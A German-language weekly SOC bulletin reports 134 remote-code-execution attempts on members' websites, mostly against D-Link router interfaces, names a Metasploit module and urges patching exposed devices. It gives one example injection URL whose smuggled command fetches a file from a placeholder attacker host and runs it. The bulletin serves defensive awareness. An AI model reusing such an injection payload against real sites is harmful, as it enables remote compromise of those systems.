KW30: CSOC-Event der Woche – Remote-Code-Ausführung
Durchschnittliche CSOC-Gesamtevents pro Tag: 47.334
Detektionshäufigkeit Remote-Code-Ausführung auf Webseiten: 134
Eventbeschreibung Remote-Code-Ausführung auf Webseiten / Kritikalität = hoch (9 / 10)
In der vergangenen Woche konnten wir 134 Male den Versuch einer Remote-Code-Ausführung (auch: Remote-Code-Execution) auf Webseiten und -Portalen unserer HUB-Mitglieder feststellen. Eine Remote-Code-Ausführung beschreibt das Einschleusen und Ausführen von Codes auf fremden Systemen. In den meisten Fällen handelt es sich bei den Zielsystemen um Geräte oder Dienste, die über das Internet erreichbar sind und eine entsprechende Schwachstelle besitzen.
Die Exploits, mit denen in dieser Woche versucht wurde, den fremden Code auf das System zu schleusen, wandten sich hauptsächlich gegen Weboberflächen von Routern des Herstellers D-Link. Innerhalb des Frameworks Metasploit (Hacker-Tool) existieren entsprechende Exploits für mehrere Systeme von D-Link. Der neuste Exploit trägt dort die Bezeichnung dlink_dir850l_unauth_exec. Auch wenn Sie keinen D-Link-Router im Einsatz haben sollten, dessen Weboberfläche direkt über das Internet zu erreichen ist, überprüfen Sie bitte regelmäßig die Softwareversion Ihrer öffentlich (aus dem Internet) erreichbaren Geräte.
Technische Beschreibung: Remote-Code-Ausführung auf Webseiten
Das Schema der versuchten Remote-Code-Ausführungs-Angriffe, die wir beobachten konnten, ist meist identisch. Dabei wird grundsätzlich versucht, Kommandozeilenbefehle an das Betriebssystem zu übergeben, welches die Webseite betreibt. So wird beispielsweise versucht, Befehle in die URL einzubetten und aufzurufen. Als Beispiel könnte aus der Ursprungs-URL der fiktiven Webseite http://fiktive-webseite.de/login.php plötzlich eine URL mit Schadcode werden. Bei erfolgreicher Ausführung des Schadcodes im folgenden Beispiel lädt das Zielsystem vom Angreifer-System eine Datei herunter (wget http://IP-des-Angreifers) und führt diese aus (sh /tmp/xd): http://fiktive-webseite.de/login.php?cli=aaaa%27;wget%20http://IP-des-Angreifers%20-O%20-%3F%20/tmp/xd;sh%20/tmp/xd%28 (Beispiel-URL)